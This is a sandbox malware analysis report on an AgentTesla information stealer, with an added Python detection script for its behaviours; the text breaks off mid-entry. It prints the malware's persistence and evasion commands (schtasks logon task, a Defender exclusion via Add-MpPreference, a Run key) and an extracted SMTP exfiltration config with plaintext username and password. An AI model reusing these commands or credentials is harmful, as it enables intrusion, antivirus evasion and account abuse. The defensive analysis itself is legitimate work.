Windows Analysis Report
Quotation Order.exe

Overview

General Information

Sample name: Quotation Order.exe
Analysis ID: 1432027
MD5: d797aae1eaf481e9c887482192b84109
SHA1: acf58b4eb3f0ffda9a2cd91def583422a11ed873
SHA256: cbda8606094d0493370b0f219edaba9be92444967aa9259d3e9323314dca2daa
Tags: exe

Detection

AgentTesla
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates multiple autostart registry keys
Disables UAC (registry)
Drops PE files with benign system names
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Quotation Order.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\Quotation Order.exe" MD5: D797AAE1EAF481E9C887482192B84109)
    • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7912 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8016 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7936 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp25B.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 8024 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • svchost.exe (PID: 8164 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: D797AAE1EAF481E9C887482192B84109)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegSvcs.exe (PID: 7416 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • AddInProcess32.exe (PID: 8032 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • InstallUtil.exe (PID: 7972 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • CasPol.exe (PID: 7440 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
        • CasPol.exe (PID: 7388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
        • WerFault.exe (PID: 8040 cmdline: C:\Windows\system32\WerFault.exe -u -p 8164 -s 1688 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7488 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7564 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7600 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7668 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7700 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8072 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: D797AAE1EAF481E9C887482192B84109)
    • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7216 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • InstallUtil.exe (PID: 1984 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • RegAsm.exe (PID: 7368 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • AddInProcess32.exe (PID: 7976 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • WerFault.exe (PID: 7472 cmdline: C:\Windows\system32\WerFault.exe -u -p 8072 -s 1276 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7928 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 8092 cmdline: C:\Windows\system32\WerFault.exe -pss -s 428 -p 8072 -ip 8072 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 7888 cmdline: C:\Windows\system32\WerFault.exe -pss -s 212 -p 8164 -ip 8164 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 7892 cmdline: C:\Windows\system32\WerFault.exe -pss -s 552 -p 7412 -ip 7412 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 6872 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7412 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: D797AAE1EAF481E9C887482192B84109)
    • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AddInProcess32.exe (PID: 7240 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • AddInProcess32.exe (PID: 8000 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • WerFault.exe (PID: 3648 cmdline: C:\Windows\system32\WerFault.exe -u -p 7412 -s 1648 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • avdfUcC.exe (PID: 1240 cmdline: "C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6284 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: D797AAE1EAF481E9C887482192B84109)
    • conhost.exe (PID: 4444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • CasPol.exe (PID: 4884 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 4480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
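The process tree above contains the handful of behaviours an endpoint analyst would want to alert on: a binary named svchost.exe running from the user's AppData\Roaming folder, PowerShell adding a Defender exclusion for that path, a logon task created with /rl highest whose action points into the user profile, .NET framework utilities (RegSvcs, RegAsm, InstallUtil, CasPol, AddInProcess32) started with no arguments by that binary (the injection targets), a Run key pointing into AppData, and an outbound TCP 587 connection from CasPol.exe. The following Python script is an added example, not part of the Joe Sandbox report or of the Sigma rules it references; it expresses those checks as simple rules over constructed Sysmon-style events whose command lines are copied from the tree. The system-directory and mail-client allow-lists, the rule names and the Event structure are illustrative assumptions.

```python
"""Host-side detection of the behaviours seen in the process tree above.

Constructed Sysmon-style events: EventID 1 (process create), 3 (network
connection) and 13 (registry value set). Command lines are copied from the
report; the allow-lists are illustrative assumptions, not a real baseline.
"""
import re
from dataclasses import dataclass

SYSTEM_PROCESS_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "services.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# .NET framework utilities commonly used as hollowing targets; a legitimate
# invocation carries arguments and is not started by a binary under C:\Users.
DOTNET_INJECTION_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe",
                          "caspol.exe", "addinprocess32.exe"}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}   # assumed local allow-list
SMTP_PORTS = {25, 465, 587}


@dataclass
class Event:
    event_id: int
    image: str
    command_line: str = ""
    parent_image: str = ""
    dest_port: int = 0
    target_object: str = ""
    details: str = ""


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _no_arguments(ev: Event) -> bool:
    """True when the command line is only the (optionally quoted) image path."""
    return ev.command_line.strip().strip('"').lower() == ev.image.lower()


def detect(ev: Event) -> list:
    """Return the names of all rules the event triggers (empty list if none)."""
    hits = []
    name, cl = _name(ev.image), ev.command_line.lower()
    if ev.event_id == 1:
        if name in SYSTEM_PROCESS_NAMES and not ev.image.lower().startswith(SYSTEM_DIRS):
            hits.append("system_process_name_outside_system32")
        if name == "powershell.exe" and "add-mppreference" in cl and "-exclusion" in cl:
            hits.append("defender_exclusion_added")
        if (name == "schtasks.exe" and "/create" in cl
                and re.search(r"/rl\s+highest", cl) and re.search(r"\\(appdata|temp)\\", cl)):
            hits.append("schtasks_highest_from_user_profile")
        if (name in DOTNET_INJECTION_HOSTS and _no_arguments(ev)
                and "\\users\\" in ev.parent_image.lower()):
            hits.append("dotnet_host_spawned_without_args_from_user_path")
    elif ev.event_id == 3:
        if ev.dest_port in SMTP_PORTS and name not in MAIL_CLIENTS:
            hits.append("smtp_from_non_mail_process")
    elif ev.event_id == 13:
        if (re.search(r"\\currentversion\\run\\", ev.target_object.lower())
                and "\\appdata\\" in ev.details.lower()):
            hits.append("run_key_points_into_appdata")
    return hits


def triage(events) -> dict:
    """Map event index -> rule hits for every event that triggers a rule."""
    findings = {}
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            findings[i] = hits
    return findings


# Constructed from the command lines in the process tree and Sigma evidence.
SAMPLE_EVENTS = [
    Event(1, r"C:\Users\user\AppData\Roaming\svchost.exe",
          r'"C:\Users\user\AppData\Roaming\svchost.exe"', r"C:\Windows\System32\cmd.exe"),
    Event(1, r"C:\Windows\System32\svchost.exe",            # genuine service host
          r"C:\Windows\System32\svchost.exe -k NetworkService -p", r"C:\Windows\System32\services.exe"),
    Event(1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
          r'-ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force',
          r"C:\Users\user\AppData\Roaming\svchost.exe"),
    Event(1, r"C:\Windows\System32\schtasks.exe",
          r'''schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' ''',
          r"C:\Windows\System32\cmd.exe"),
    Event(1, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
          r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"',
          r"C:\Users\user\AppData\Roaming\svchost.exe"),
    Event(3, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe", dest_port=587),
    Event(13, r"C:\Users\user\Desktop\Quotation Order.exe",
          target_object=r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost",
          details=r'"C:\Users\user\AppData\Roaming\svchost.exe"'),
]

if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS).items():
        print(f"event {i} ({_name(SAMPLE_EVENTS[i].image)}): {', '.join(hits)}")
```

Run directly, the script reports six findings and stays silent on the genuine `svchost.exe -k NetworkService -p` event. The .NET host rule deliberately keys on the combination of an empty command line and a parent under C:\Users rather than on the utility names alone, because RegAsm, RegSvcs and InstallUtil are invoked legitimately by installers, always with arguments.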
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware configuration (extracted): {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.bonnyriggdentalsurgery.com.au", "Username": "hr1@bonnyriggdentalsurgery.com.au", "Password": "Sages101*"}
Source | Rule | Description | Author | Strings
0000001F.00000002.1627243849.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000001A.00000002.1487009646.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000002B.00000002.2520439287.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(40 entries in the full report; only the first five are reproduced here)

Source | Rule | Description | Author | Strings
17.2.svchost.exe.1fc9f239308.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
17.2.svchost.exe.1fc9f239308.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
17.2.svchost.exe.1fc9f239308.2.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x3283e:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x328b0:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x3293a:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x329cc:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x32a36:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x32aa8:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x32b3e:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x32bce:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
17.2.svchost.exe.1fc9f1fd6c0.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
17.2.svchost.exe.1fc9f1fd6c0.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(13 entries in the full report; only the first five are reproduced here)

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\Quotation Order.exe, ProcessId: 7384, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation Order.exe", ParentImage: C:\Users\user\Desktop\Quotation Order.exe, ParentProcessId: 7384, ParentProcessName: Quotation Order.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7912, ProcessName: cmd.exe
Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation Order.exe", ParentImage: C:\Users\user\Desktop\Quotation Order.exe, ParentProcessId: 7384, ParentProcessName: Quotation Order.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7912, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 8072, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 7216, ProcessName: powershell.exe
Source: Process started | Author: David Burkett, @signalblur | Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8092, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 8072, ProcessName: svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8092, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 8072, ProcessName: svchost.exe
Source: Process started | Author: Tim Rauch | Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 8072, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 8080, ProcessName: conhost.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\AppData\Roaming\svchost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Quotation Order.exe, ProcessId: 7384, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 8072, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 7216, ProcessName: powershell.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 192.254.225.166, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Initiated: true, ProcessId: 7440, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49703
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7912, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , ProcessId: 8016, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp25B.tmp.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7936, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 8164, ProcessName: svchost.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 8072, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, 